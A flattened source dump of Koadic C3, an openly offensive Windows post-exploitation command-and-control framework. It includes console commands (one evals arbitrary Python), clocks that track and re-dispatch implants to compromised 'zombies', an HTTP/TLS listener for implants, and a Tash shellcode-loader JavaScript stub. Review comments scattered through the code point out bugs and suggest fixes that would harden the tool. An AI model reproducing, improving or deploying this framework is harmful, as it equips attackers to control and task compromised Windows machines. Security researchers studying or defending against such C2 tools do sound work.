You probably just want to stage a native RAT."); 30 | -------------------------------------------------------------------------------- /core/commands/previous.py: -------------------------------------------------------------------------------- 1 | DESCRIPTION = "go back to the last used module" 2 | 3 | def autocomplete(shell, line, text, state): 4 | pass 5 | 6 | def help(shell): 7 | pass 8 | 9 | def execute(shell, cmd): 10 | tmp = shell.state 11 | try: 12 | shell.state = shell.previous 13 | except: 14 | pass 15 | shell.previous = tmp 16 | 17 | -------------------------------------------------------------------------------- /core/commands/pyexec.py: -------------------------------------------------------------------------------- 1 | DESCRIPTION = "evals some python" 2 | 3 | def autocomplete(shell, line, text, state): 4 | return None 5 | 6 | def help(shell): 7 | pass 8 | 9 | def execute(shell, cmd): 10 | code = " ".join(cmd.split(" ")[1:]) 11 | exec(code) 12 | -------------------------------------------------------------------------------- /core/commands/run.py: -------------------------------------------------------------------------------- 1 | DESCRIPTION = "runs the current module" 2 | 3 | def autocomplete(shell, line, text, state): 4 | return None 5 | 6 | def help(shell): 7 | pass 8 | 9 | def execute(shell, cmd): 10 | try: 11 | env = shell.plugins[shell.state] 12 | env.run() 13 | except KeyboardInterrupt: 14 | return 15 | -------------------------------------------------------------------------------- /core/commands/set.py: -------------------------------------------------------------------------------- 1 | import os 2 | 3 | DESCRIPTION = "sets a variable for the current module" 4 | 5 | def autocomplete(shell, line, text, state): 6 | 7 | env = shell.plugins[shell.state] 8 | if len(line.split()) > 1: 9 | optionname = line.split()[1] 10 | if optionname in [x.name for x in env.options.options if not x.hidden]: 11 | option = [x for x in env.options.options if x.name 
== optionname][0] 12 | options = [] 13 | if option.boolean: 14 | options = [x for x in ['true', 'false'] if x.upper().startswith(text.upper())] 15 | if option.file: 16 | options = filepaths(text) 17 | if option.implant: 18 | pass 19 | if option.enum: 20 | options = [x for x in option.enum if x.upper().startswith(text.upper())] 21 | if options: 22 | return options[state] 23 | 24 | options = [x.name + " " for x in env.options.options if x.name.upper().startswith(text.upper()) and not x.hidden] 25 | options += [x.alias + " " for x in env.options.options if x.alias.upper().startswith(text.upper()) and not x.hidden and x.alias] 26 | 27 | try: 28 | return options[state] 29 | except: 30 | return None 31 | 32 | def filepaths(text): 33 | import readline 34 | everything = readline.get_line_buffer() 35 | cursor_idx = readline.get_begidx() 36 | idx = 0 37 | for chunk in everything.split(" "): 38 | fullpath = chunk 39 | idx += len(chunk) + 1 40 | if idx > cursor_idx: 41 | break 42 | 43 | if os.path.isfile(fullpath): 44 | return None 45 | if "/" in fullpath: 46 | d = os.path.dirname(fullpath) 47 | else: 48 | d = "." 49 | 50 | res = [] 51 | for candidate in os.listdir(d): 52 | if not candidate.startswith(text): 53 | continue 54 | if os.path.isdir(d+os.path.sep+candidate): 55 | res.append(candidate + os.path.sep) 56 | else: 57 | res.append(candidate + " ") 58 | return res 59 | 60 | def help(shell): 61 | pass 62 | 63 | def execute(shell, cmd): 64 | env = shell.plugins[shell.state] 65 | 66 | splitted = cmd.split() 67 | if len(splitted) > 1: 68 | key = splitted[1].upper() 69 | 70 | value = env.options.get(key) 71 | if value != None: 72 | 73 | # if it's >2, we set the third argument 74 | if len(splitted) > 2: 75 | value = cmd.split(None, 2)[2] 76 | if not env.options.set(key, value): 77 | shell.print_error("That value is invalid") 78 | return 79 | 80 | shell.print_good("%s => %s" % (key, value)) 81 | else: 82 | shell.print_error("Option '%s' not found." 
% (key)) 83 | -------------------------------------------------------------------------------- /core/commands/sounds.py: -------------------------------------------------------------------------------- 1 | DESCRIPTION = "turn sounds off/on: sound(0|1)" 2 | 3 | def autocomplete(shell, line, text, state): 4 | return None 5 | 6 | def help(shell): 7 | pass 8 | 9 | def execute(shell, cmd): 10 | try: 11 | import playsound 
# NOTE(review): should be `except ImportError:` -- a bare except also reports a
# playsound install that crashes on import as "not installed".
12 | except: 13 | shell.print_error('You do not have the playsound module installed. Please run \'pip install playsound\' to enable this feature!') 14 | return 15 | 16 | splitted = cmd.split() 17 | 18 | if len(splitted) > 1: 19 | sw = splitted[1].lower() 20 | if sw == "1" or sw == "true" or sw == "on": 21 | from core.sounds import sounds 22 | shell.sounds = sounds 23 | shell.play_sound('ON') 24 | else: 25 | shell.sounds = {} 26 | 27 | shell.print_status("Sounds: %s" % ("On" if shell.sounds else "Off")) 28 | -------------------------------------------------------------------------------- /core/commands/spool.py: -------------------------------------------------------------------------------- 1 | import os 2 | 3 | DESCRIPTION = "write output to a file" 4 | 
# NOTE(review): filepaths() returns None when the fragment already names a file
# (`None[state]` -> TypeError) and `options[state]` raises IndexError past the last
# match. set.py wraps the same lookup in try/except and returns None; mirror that.
5 | def autocomplete(shell, line, text, state): 6 | options = filepaths(text) 7 | return options[state] 8 | 9 | def help(shell): 10 | shell.print_plain("") 11 | shell.print_plain("Use %s to spool to /tmp/koadic.spool" % (shell.colors.colorize("spool on", shell.colors.BOLD))) 12 | shell.print_plain("Use %s to spool to a defined file" % (shell.colors.colorize("spool FILEPATH", shell.colors.BOLD))) 13 | shell.print_plain("Use %s to stop spooling" % (shell.colors.colorize("spool off", shell.colors.BOLD))) 14 | shell.print_plain("") 15 | 
# Complete the path fragment under the readline cursor (directories get a
# trailing separator, files a trailing space; None if it already names a file).
# NOTE(review): identical copy of filepaths() in core/commands/set.py -- share it.
16 | def filepaths(text): 17 | import readline 18 | everything = readline.get_line_buffer() 19 | cursor_idx = readline.get_begidx() 20 | idx = 0 21 | for chunk in everything.split(" "): 22 | fullpath = chunk 23 | idx += len(chunk) + 1 24 | if idx > cursor_idx: 25 | break 26 
| 27 | if os.path.isfile(fullpath): 28 | return None 29 | if "/" in fullpath: 30 | d = os.path.dirname(fullpath) 31 | else: 32 | d = "." 33 | 34 | res = [] 35 | for candidate in os.listdir(d): 36 | if not candidate.startswith(text): 37 | continue 38 | if os.path.isdir(d+os.path.sep+candidate): 39 | res.append(candidate + os.path.sep) 40 | else: 41 | res.append(candidate + " ") 42 | return res 43 | 
# Turn console spooling on/off or point it at a file. This only stores the path
# in shell.spool; the file is presumably opened elsewhere (shell.py) when output
# is printed, so nothing here creates or validates it.
44 | def execute(shell, cmd): 45 | 46 | splitted = cmd.split() 47 | 48 | if len(splitted) > 1: 49 | option = splitted[1] 50 | if option == 'on': 
# SECURITY: fixed, predictable name in the shared, world-writable /tmp. Whatever
# the console prints ends up here -- command output and any credentials pulled
# from zombies. Another local account can pre-create that name or plant a symlink
# before the operator types `spool on`, and can read the file unless the open
# (not visible here) uses O_EXCL|O_NOFOLLOW and mode 0600. Prefer a file under
# the operator's home or the koadic working directory with restrictive
# permissions, and make the default path configurable rather than hard-coded.
51 | shell.spool = '/tmp/koadic.spool' 52 | shell.print_status("Spooling to /tmp/koadic.spool...") 53 | elif option == 'off': 54 | if shell.spool: 55 | shell.spool = False 56 | shell.print_status("Spooling stopped...") 57 | else: 
# operator-chosen path, stored verbatim.
58 | shell.spool = option 59 | shell.print_status("Spooling to "+option+"...") 60 | else: 61 | help(shell) 62 | -------------------------------------------------------------------------------- /core/commands/taco.py: -------------------------------------------------------------------------------- 1 | DESCRIPTION = "taco time" 2 | 3 | def autocomplete(shell, line, text, state): 4 | return None 5 | 6 | def help(shell): 7 | pass 8 | 9 | def execute(shell, cmd): 10 | 
# NOTE(review): path is relative to the process CWD, so this breaks when koadic is
# launched from another directory; the file handle is also never closed (use `with`).
11 | print(open("data/taco.txt", "rb").read().decode("unicode_escape")) 12 | -------------------------------------------------------------------------------- /core/commands/unset.py: -------------------------------------------------------------------------------- 1 | DESCRIPTION = "unsets a variable for the current module" 2 | 3 | def autocomplete(shell, line, text, state): 4 | 5 | # todo, here we can provide some defaults for bools/enums? i.e. 
True/False 6 | if len(line.split()) > 2: 7 | return None 8 | 9 | env = shell.plugins[shell.state] 10 | options = [x.name + " " for x in env.options.options if x.name.upper().startswith(text.upper()) and not x.hidden] 11 | options += [x.alias + " " for x in env.options.options if x.alias.upper().startswith(text.upper()) and not x.hidden and x.alias] 12 | 13 | try: 14 | return options[state] 15 | except: 16 | return None 17 | 18 | def help(shell): 19 | pass 20 | 21 | def execute(shell, cmd): 22 | env = shell.plugins[shell.state] 23 | 24 | splitted = cmd.split() 25 | if len(splitted) > 1: 26 | key = splitted[1].upper() 27 | 28 | value = env.options.get(key) 
# Options.get() returns None only for an unknown name; `is not None` is the idiom.
29 | if value != None: 30 | 
# NOTE(review): "unset" writes the empty string instead of restoring the value the
# module registered (core/options.py keeps it as Option.default). For enum=
# options "" is not a member, so Options.set() rejects it and such an option can
# never be unset; the same happens for any validate= option whose validator
# rejects "". Restoring `option.default` would fix both and match what "unset"
# is expected to mean.
31 | value = "" 32 | if not env.options.set(key, value): 33 | shell.print_error("That value is invalid") 34 | return 35 | 36 | shell.print_good("%s => %s" % (key, value)) 37 | else: 38 | shell.print_error("Option '%s' not found." % (key)) 39 | -------------------------------------------------------------------------------- /core/commands/use.py: -------------------------------------------------------------------------------- 1 | DESCRIPTION = "switch to a different module" 2 | 
# Complete module paths one "/" component at a time; bare basenames are also
# offered so `use foo` works without the full path (see execute below).
3 | def autocomplete(shell, line, text, state): 4 | import readline 5 | everything = readline.get_line_buffer() 6 | cursor_idx = readline.get_begidx() 7 | idx = 0 8 | for chunk in everything.split(" "): 9 | fulltext = chunk 10 | idx += len(chunk) + 1 11 | if idx > cursor_idx: 12 | break 13 | prefix, suffix = fulltext.rsplit("/",maxsplit=1) if "/" in fulltext else ("",fulltext) 14 | if prefix: 15 | prefix += "/" 16 | 17 | options = [] 18 | tmp = list(shell.plugins.keys()) 19 | for plugin in shell.plugins: 20 | tmp.append(plugin.split("/")[-1]) 21 | for plugin in tmp: 22 | if not plugin.startswith(fulltext): 23 | continue 24 | chunk = plugin[len(prefix):] 25 | if "/" in chunk: 26 | options.append(chunk.split("/")[0]+"/") 27 | else: 28 | options.append(chunk+" ") 29 | options = list(sorted(set(options))) 30 | try: 31 
| return options[state] 32 | except: 33 | return None 34 | 35 | def help(shell): 36 | pass 37 | 
# Select a module by full path or by bare basename (case-insensitive).
38 | def execute(shell, cmd): 39 | splitted = cmd.split() 40 | 41 | if len(splitted) > 1: 42 | module = splitted[1] 43 | if "/" not in module: 
# BUG: for a bare name with no match the list is empty and `[0]` raises
# IndexError here, so the "No module named" branch below is never reached in
# that case. Guard it: `matches = [...]` / `if not matches: shell.print_error(...);
# return` / `module = matches[0]`. Also, if two modules share a basename, the
# first one in plugin order wins silently -- worth reporting the ambiguity.
44 | module = [k for k in shell.plugins if k.lower().split('/')[-1] == module.lower()][0] 45 | if module not in shell.plugins: 46 | shell.print_error("No module named %s" % (module)) 47 | return 48 | 49 | shell.previous = shell.state 50 | shell.state = module 51 | -------------------------------------------------------------------------------- /core/commands/valentine.py: -------------------------------------------------------------------------------- 1 | DESCRIPTION = "Love is in the wire" 2 | 3 | def autocomplete(shell, line, text, state): 4 | return None 5 | 6 | def help(shell): 7 | pass 8 | 9 | def execute(shell, cmd): 10 | 
# NOTE(review): CWD-relative path and an unclosed file handle (same as taco.py).
11 | print(open("data/valentine.txt", "rb").read().decode("unicode_escape")) 12 | -------------------------------------------------------------------------------- /core/commands/verbose.py: -------------------------------------------------------------------------------- 1 | DESCRIPTION = "turn verbosity off/on: verbose (0|1)" 2 | 3 | def autocomplete(shell, line, text, state): 4 | return None 5 | 6 | def help(shell): 7 | pass 8 | 9 | def execute(shell, cmd): 10 | splitted = cmd.split() 11 | 12 | if len(splitted) > 1: 13 | sw = splitted[1].lower() 14 | if sw == "1" or sw == "true" or sw == "on": 15 | shell.verbose = True 16 | else: 17 | shell.verbose = False 18 | 19 | shell.print_status("Verbose mode: %s" % ("On" if shell.verbose else "Off")) 20 | -------------------------------------------------------------------------------- /core/extant.py: -------------------------------------------------------------------------------- 1 | import threading 2 | import time 3 | 4 | import core.session 5 | 6 | ''' Periodically checks if sessions are alive ''' 7 | class Extant(object): 8 | 9 | def __init__(self, shell): 10 | 
self.shell = shell 11 | self.check_alive_timer = None 12 | self.check() 13 | 
# Re-arms itself every second on a daemon Timer and flips each session between
# ALIVE and dead/reconnect depending on how long it has been silent.
14 | def check(self): 15 | if self.check_alive_timer is not None: 16 | self.check_alive_timer.cancel() 17 | 18 | self.check_alive_timer = threading.Timer(1.0, self.check) 19 | self.check_alive_timer.daemon = True 20 | self.check_alive_timer.start() 21 | 22 | now = time.time() 23 | 
# seconds of silence before a zombie is marked dead. Hard-coded: any zombie
# that checks in less often than this will flap dead/reconnect on every cycle.
# Worth exposing as an option.
24 | max_delta = 10 25 | 
# NOTE(review): this runs on the timer thread and iterates the live dict. If
# another thread (presumably the HTTP handler registering a new zombie) inserts
# while the loop runs, Python raises RuntimeError ("dictionary changed size
# during iteration") and this tick's liveness pass is lost -- the clock survives
# only because the Timer above was re-armed first. Iterate a snapshot instead:
# `for session in list(self.shell.sessions.values()):` (skey is unused).
26 | for skey, session in self.shell.sessions.items(): 27 | delta = now - session.last_active 28 | #delta = datetime.timedelta(seconds=int(delta)) 29 | 30 | if session.status == core.session.Session.ALIVE: 31 | if delta > max_delta: 32 | self.shell.play_sound('TIMEOUT') 33 | session.set_dead() 34 | else: 35 | if delta < max_delta: 36 | self.shell.play_sound('RECONNECT') 37 | session.set_reconnect() 38 | -------------------------------------------------------------------------------- /core/implant.py: -------------------------------------------------------------------------------- 1 | import core.plugin 2 | import threading 3 | 4 | class Implant(core.plugin.Plugin): 5 | RJOB_ID = 0 6 | RJOB_ID_LOCK = threading.Lock() 7 | 8 | def __init__(self, shell): 9 | super(Implant, self).__init__(shell) 10 | self.options.register("ZOMBIE", "ALL", "the zombie to target") 
# NOTE(review): IGNOREADMIN/IGNOREBUILD are validated through enum=, but REPEAT
# (boolean=True, no enum) and the two numeric options below have no validator at
# all -- Options.set() accepts any string for them (core/options.py).
11 | self.options.register("IGNOREADMIN", "false", "ignore session elevation restrictions", enum=["true", "false"], advanced=True) 12 | self.options.register("IGNOREBUILD", "false", "ignore build number", enum=["true", "false"], advanced=True) 13 | self.options.register("REPEAT", "false", "Run the implant multiple times", boolean = True, advanced = True) 14 | self.options.register("REPEATTIME", "600", "Seconds between running implant", advanced = True) 15 | self.options.register("REPEATCYCLES", "3", "Number of times to run (0 = indefinite)", advanced = True) 16 | 
# Register this implant with the repeat-job clock (core/repeatjobclock.py).
# NOTE(review): int() raises ValueError here, at run time, if the operator set a
# non-numeric REPEATTIME/REPEATCYCLES -- register both with a numeric validate=
# so the bad value is rejected by `set` instead, or catch ValueError and
# print_error.
17 | def repeat(self, shell, workloads, options): 18 | rt = int(self.options.get("REPEATTIME")) 19 | rc = int(self.options.get("REPEATCYCLES")) 20 | state = self.STATE 21 | 
with Implant.RJOB_ID_LOCK: 22 | key = str(Implant.RJOB_ID) 23 | Implant.RJOB_ID += 1 
# Positional record consumed by RepeatJobClock.check():
#   [0] seconds until the next run (counted down each tick)
#   [1] cycles remaining (0 = indefinite)
#   [2] workloads, [3] job   -> passed to dispatch()
#   [4] interval that [0] is reset to after a run
#   [5] module state, [6] options snapshot (ZOMBIE is read from it)
#   [7] this implant (dispatch target)
# NOTE(review): the lock only protects the id counter; whether this insert is
# inside the `with` block is not recoverable from this flattened listing, and
# the clock thread does not take the lock while it iterates the same dict.
24 | shell.repeatjobs[key] = [rt, rc, workloads, self.job, rt, state, options, self] 25 | -------------------------------------------------------------------------------- /core/options.py: -------------------------------------------------------------------------------- 1 | 
# One module option. Flags (validate, required, advanced, hidden, boolean,
# file, implant, alias, enum) default as below and are overridden via kwargs.
2 | class Option(object): 3 | def __init__(self, name, value, description, **kwargs): 4 | self.name = name 5 | self.description = description 6 | self.validate = None 7 | self.required = True 8 | self.advanced = False 9 | self.hidden = False 10 | self.boolean = False 11 | self.file = False 12 | self.implant = False 13 | self.alias = "" 14 | self.enum = [] 15 | self.value = value 16 | self.default = value 
# kwargs can override any attribute above, including value/default/name; a
# mistyped kwarg silently creates a new attribute instead of failing.
17 | self.__dict__.update(kwargs) 18 | 
# Store `value` if it passes validation; returns False (value untouched) otherwise.
# validate= takes precedence and, when present, the enum list is NOT checked
# (elif). With neither, anything is accepted -- values arrive from the console as
# str, so boolean=True options hold "true"/"false"-like strings, never bool.
19 | def set(self, value): 20 | if self.validate is not None: 21 | if not self.validate(value): 22 | return False 23 | 24 | elif len(self.enum) > 0: 25 | if value not in self.enum: 26 | return False 27 | 28 | self.value = value 29 | return True 30 | 31 | class Options(object): 32 | def __init__(self): 33 | self.options = [] 34 | 35 | def register(self, name, value, description, **kwargs): 36 | name = name.upper() 37 | option = Option(name, value, description, **kwargs) 38 | self.options.append(option) 39 | 
# Look up by name or alias (case-insensitive). Returns None only for an unknown
# name; an unset option yields "". The trailing `and name` keeps the empty
# default alias from matching (precedence: name == n or (alias == n and n)).
40 | def get(self, name): 41 | name = name.upper() 42 | for option in self.options: 43 | if option.name == name or option.alias == name and name: 44 | return option.value 45 | 46 | return None 47 | 48 | def set(self, name, value): 49 | name = name.upper() 50 | 51 | for option in self.options: 52 | if option.name == name or option.alias == name and name: 53 | return option.set(value) 54 | 55 | return False 56 | 
# Deep copy, so a per-job snapshot is isolated from later `set` commands.
57 | def copy(self): 58 | import copy 59 | return copy.deepcopy(self) 60 | -------------------------------------------------------------------------------- /core/payload.py: -------------------------------------------------------------------------------- 1 | import 
threading 2 | 3 | 
# Holds payload bytes plus a process-wide monotonically increasing id.
class Payload(object): 4 | PAYLOAD_ID = 0 5 | PAYLOAD_ID_LOCK = threading.Lock() 6 | 7 | def __init__(self, data=""): 8 | self.data = data 9 | with Payload.PAYLOAD_ID_LOCK: 10 | self.id = Payload.PAYLOAD_ID 11 | Payload.PAYLOAD_ID += 1 12 | -------------------------------------------------------------------------------- /core/repeatjobclock.py: -------------------------------------------------------------------------------- 1 | import threading 2 | 3 | ''' Updates clock and runs repeat jobs ''' 4 | class RepeatJobClock(object): 5 | 6 | def __init__(self, shell): 7 | self.shell = shell 8 | self.check_alive_timer = None 9 | self.check() 10 | 
# Runs once a second on a daemon Timer. Each entry of shell.repeatjobs is the
# positional list built by Implant.repeat(): [0] countdown, [1] cycles left,
# [2] workloads, [3] job, [4] interval, [5] state, [6] options, [7] implant.
# NOTE(review): if the loop body takes longer than a second (dispatch runs
# inline here), the Timer armed above fires while this call is still running,
# so two check() calls can mutate the same records concurrently.
11 | def check(self): 12 | if self.check_alive_timer is not None: 13 | self.check_alive_timer.cancel() 14 | 15 | self.check_alive_timer = threading.Timer(1.0, self.check) 16 | self.check_alive_timer.daemon = True 17 | self.check_alive_timer.start() 18 | 19 | remove_jobs = [] 20 | 
# NOTE(review): timer-thread iteration over the live dict while Implant.repeat()
# inserts into it (presumably from the console thread). An insert mid-loop raises
# RuntimeError and aborts this tick. Snapshot the keys first:
# `for rjob in list(self.shell.repeatjobs):`.
21 | for rjob in self.shell.repeatjobs: 22 | rjobval = self.shell.repeatjobs[rjob] 23 | if rjobval[0] > 0: 24 | rjobval[0] = rjobval[0]- 1 25 | continue 26 | 27 | zombie = [o.value for o in rjobval[6].options if o.name == "ZOMBIE"][0] 28 | rjobval[7].dispatch(rjobval[2], rjobval[3], False, zombie) 29 | rjobval[0] = rjobval[4] 30 | 31 | if rjobval[1] == 0: 32 | continue 
# NOTE(review): cycle accounting looks off by one. If the initial run() dispatch
# counts as cycle 1, REPEATCYCLES=3 gives 1 + 2 runs as expected, but
# REPEATCYCLES=1 and =2 both still get one repeat here, because removal happens
# only after the dispatch above. If cycles <= 1 should mean "run once", the
# boundary needs to be `> 1`, or repeat() should not register the job at all.
# Confirm against run().
33 | if rjobval[1] > 2: 34 | rjobval[1] = rjobval[1] - 1 35 | continue 36 | 37 | remove_jobs.append(rjob) 38 | 39 | if remove_jobs: 
# Copy-and-swap avoids deleting during iteration, but any job that
# Implant.repeat() inserts between this copy and the assignment below is
# silently dropped (lost update). `self.shell.repeatjobs.pop(r, None)` on the
# original dict -- or a lock shared with repeat() -- is safer.
40 | tmp = dict(self.shell.repeatjobs) 41 | for r in remove_jobs: 42 | del tmp[r] 43 | self.shell.repeatjobs = tmp 44 | -------------------------------------------------------------------------------- /core/server.py: -------------------------------------------------------------------------------- 1 | try: 2 | from SocketServer import ThreadingMixIn 3 | from BaseHTTPServer import BaseHTTPRequestHandler, HTTPServer 
# NOTE(review): `except ImportError:` -- the bare except masks unrelated errors.
4 | except: 5 | # why is python3 so terrible for backward compatibility? 
6 | from socketserver import ThreadingMixIn 7 | from http.server import BaseHTTPRequestHandler, HTTPServer 8 | 9 | import core.handler 10 | import core.session 11 | import core.loader 12 | import core.payload 13 | 14 | import socket 15 | import random 16 | import threading 17 | import os 18 | import ssl 19 | import io 20 | import time 21 | import datetime 22 | import copy 23 | 
# One thread per connection; handler threads are marked daemon in _setup_server.
24 | class ThreadedHTTPServer(ThreadingMixIn, HTTPServer): 25 | pass 26 | 
# Listener thread wrapping an HTTP(S) server. The socket is bound in __init__
# (via _setup_server), not in run(): a port already in use surfaces as OSError
# from the constructor.
27 | class Server(threading.Thread): 28 | def __init__(self, port, handler, keypath, certpath, shell, options): 29 | threading.Thread.__init__(self) 30 | self.daemon = True 31 | 32 | self.handler_class = handler 33 | self.port = port 34 | self.keypath = keypath 35 | self.certpath = certpath 36 | self.shell = shell 37 | self.options = options 38 | self.killed = False 39 | 40 | self._setup_server() 41 | 42 | def _setup_server(self): 
# SECURITY: binds every IPv4 interface unconditionally, so the stager/implant
# endpoint is also reachable on the operator's management/VPN side. The bind
# address should come from the listener options, with 0.0.0.0 an explicit opt-in.
43 | self.http = ThreadedHTTPServer(('0.0.0.0', self.port), self.handler_class) 44 | self.http.timeout = None 45 | self.http.daemon_threads = True 46 | self.http.server = self 47 | self.http.shell = self.shell 48 | self.http.options = self.options 49 | 50 | if self.keypath and self.certpath: 51 | self.keypath = os.path.abspath(self.keypath) 52 | self.certpath = os.path.abspath(self.certpath) 
# NOTE(review): ssl.wrap_socket() was deprecated in 3.7 and removed in 3.12.
# Replacement: `ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)`,
# `ctx.load_cert_chain(self.certpath, self.keypath)`,
# `self.http.socket = ctx.wrap_socket(self.http.socket, server_side=True)`.
# A context also lets you pin ctx.minimum_version; the module-level function
# leaves protocol and cipher choice at interpreter defaults. Wrapping the
# listening socket is fine with socketserver: accept() then returns SSLSockets.
53 | self.http.socket = ssl.wrap_socket(self.http.socket, keyfile=self.keypath, certfile=self.certpath, server_side = True) 54 | 55 | def run(self): 56 | 57 | try: 58 | self.http.serve_forever() 
# NOTE(review): silently swallows whatever killed serve_forever; a dead listener
# goes unnoticed. Log (or print_error) before returning.
59 | except: 60 | pass 61 | 62 | def shutdown(self): 63 | 64 | # shut down the server/socket 65 | self.http.shutdown() 66 | self.http.socket.close() 67 | self.http.server_close() 
# BUG: `_Thread__stop` is Python 2's mangled private name; Python 3's Thread has
# `_stop`, so this line raises AttributeError (the codebase is already
# Python-3-only, e.g. `rsplit("/", maxsplit=1)` in commands/use.py), the socket
# is already closed by then, and the loop below never runs unless the caller
# catches it. `thread.isAlive()` was removed in 3.9 too (`is_alive()`), and
# "stopping" other threads this way only flips a flag -- it never interrupts
# them. With daemon threads and daemon_threads=True the loop is unnecessary;
# drop both and let `self.http.shutdown()` + `join()` do the work.
68 | self._Thread__stop() 69 | 70 | # make sure all the threads are killed 71 | for thread in threading.enumerate(): 72 | if thread.isAlive(): 73 | try: 74 | thread._Thread__stop() 75 | except: 76 | pass 77 | -------------------------------------------------------------------------------- /core/tick.py: 
-------------------------------------------------------------------------------- 1 | import core.extant 2 | import core.repeatjobclock 3 | import core.restoreclock 4 | 5 | ''' Kick off clocks ''' 6 | class Tick(object): 7 | 8 | def __init__(self, shell): 9 | self.start_timers(shell) 10 | 11 | def start_timers(self, shell): 12 | self.extant = core.extant.Extant(shell) 13 | self.repeatjobclock = core.repeatjobclock.RepeatJobClock(shell) 14 | self.restoreclock = core.restoreclock.RestoreClock(shell) 15 | -------------------------------------------------------------------------------- /data/banner.txt: -------------------------------------------------------------------------------- 1 | 2 | \033[36;1m.\033[0m 3 | \033[36;1m/\033[0m \033[36;1m\\\033[0m 4 | _ _ \033[36;1m|\033[0m \033[36;1m|\033[0m 5 | | | _____ __ _ __| |\033[36;1m|\033[0m \033[36;1m|\033[0m ___ 6 | | |/ / \033[31;1m_\033[0m \\ / _` |/ _` |\033[36;1m|\033[0m\033[34;1m.\033[0m\033[36;1m|\033[0m / __| 7 | | / \033[31;1m(o)\033[0m | (_| | (_| |\033[36;1m|\033[0m\033[34;1m.\033[0m\033[36;1m|\033[0m| (__ 8 | |_|\\_\\_\033[31;1m^\033[0m_/ \\__,_|\\__,_|\033[36;1m|\033[0m\033[34;1m:\033[0m\033[36;1m|\033[0m \\___| 9 | \033[36;1m|\033[0m\033[34;1m:\033[0m\033[36;1m|\033[0m 10 | ~\033[33;1m\\==8==/\033[0m~ 11 | \033[31;1m8\033[0m 12 | \033[31;1mO\033[0m 13 | -------------------------------------------------------------------------------- /data/banner_info.txt: -------------------------------------------------------------------------------- 1 | 2 | %s-{ \033[34;1mKoadic C3 - COM Command & Control\033[0m }- 3 | %s\033[32;1mWindows Post-Exploitation Tools\033[0m 4 | %s\033[3mEndless Intellect\033[0m 5 | 6 | %s~[ \033[1mVersion:\033[0m %%%s ]~ 7 | %s~[ \033[1mStagers:\033[0m %%%s ]~ 8 | %s~[ \033[1mImplants:\033[0m %%%s ]~ 9 | 10 | -------------------------------------------------------------------------------- /data/bin/Tash/Release/Tash.dll: 
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/offsecginger/koadic/457f9a3ff394c989cdb4c599ab90eb34fb2c762c/data/bin/Tash/Release/Tash.dll -------------------------------------------------------------------------------- /data/bin/Tash/Release/Tash.exp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/offsecginger/koadic/457f9a3ff394c989cdb4c599ab90eb34fb2c762c/data/bin/Tash/Release/Tash.exp -------------------------------------------------------------------------------- /data/bin/Tash/Release/Tash.lib: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/offsecginger/koadic/457f9a3ff394c989cdb4c599ab90eb34fb2c762c/data/bin/Tash/Release/Tash.lib -------------------------------------------------------------------------------- /data/bin/Tash/Release/TashClient.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/offsecginger/koadic/457f9a3ff394c989cdb4c599ab90eb34fb2c762c/data/bin/Tash/Release/TashClient.exe -------------------------------------------------------------------------------- /data/bin/Tash/Release/tash.x.js: -------------------------------------------------------------------------------- 1 | var manifestPath = "Tash.X.manifest"; 2 | 3 | var actCtx = new ActiveXObject( "Microsoft.Windows.ActCtx" ); 4 | actCtx.Manifest = manifestPath; 5 | 6 | var tash = actCtx.CreateObject("Tash.TashLoader"); 7 | 8 | var res = tash.Load("\x90\x90\xc3", "~~", 1); 9 | WScript.Echo(res) 10 | 11 | -------------------------------------------------------------------------------- /data/bin/Tash/Release/tash.y.js: -------------------------------------------------------------------------------- 1 | var manifestPath = "Tash.Y.manifest"; 2 | 3 | var actCtx = new ActiveXObject( "Microsoft.Windows.ActCtx" ); 4 | actCtx.Manifest 
= manifestPath; 5 | 6 | var tash = actCtx.CreateObject("Tash.TashLoader"); 7 | 8 | var res = tash.Load("\x90\x90\xc3", "~~", 1); 9 | WScript.Echo(res) 10 | 11 | -------------------------------------------------------------------------------- /data/bin/Tash/Tash.sln: -------------------------------------------------------------------------------- 1 |  2 | Microsoft Visual Studio Solution File, Format Version 10.00 3 | # Visual Studio 2008 4 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "Tash", "Tash\Tash.vcproj", "{684DCC5A-1FA6-41D7-A779-2D96BDAF478A}" 5 | EndProject 6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "TashClient", "TashClient\TashClient.vcproj", "{7507CE64-210F-424F-94CC-63A2FE4AD27E}" 7 | ProjectSection(ProjectDependencies) = postProject 8 | {684DCC5A-1FA6-41D7-A779-2D96BDAF478A} = {684DCC5A-1FA6-41D7-A779-2D96BDAF478A} 9 | EndProjectSection 10 | EndProject 11 | Global 12 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 13 | Debug|Win32 = Debug|Win32 14 | Release|Win32 = Release|Win32 15 | EndGlobalSection 16 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 17 | {684DCC5A-1FA6-41D7-A779-2D96BDAF478A}.Debug|Win32.ActiveCfg = Debug|Win32 18 | {684DCC5A-1FA6-41D7-A779-2D96BDAF478A}.Debug|Win32.Build.0 = Debug|Win32 19 | {684DCC5A-1FA6-41D7-A779-2D96BDAF478A}.Release|Win32.ActiveCfg = Release|Win32 20 | {684DCC5A-1FA6-41D7-A779-2D96BDAF478A}.Release|Win32.Build.0 = Release|Win32 21 | {7507CE64-210F-424F-94CC-63A2FE4AD27E}.Debug|Win32.ActiveCfg = Debug|Win32 22 | {7507CE64-210F-424F-94CC-63A2FE4AD27E}.Debug|Win32.Build.0 = Debug|Win32 23 | {7507CE64-210F-424F-94CC-63A2FE4AD27E}.Release|Win32.ActiveCfg = Release|Win32 24 | {7507CE64-210F-424F-94CC-63A2FE4AD27E}.Release|Win32.Build.0 = Release|Win32 25 | EndGlobalSection 26 | GlobalSection(SolutionProperties) = preSolution 27 | HideSolutionNode = FALSE 28 | EndGlobalSection 29 | EndGlobal 30 | 
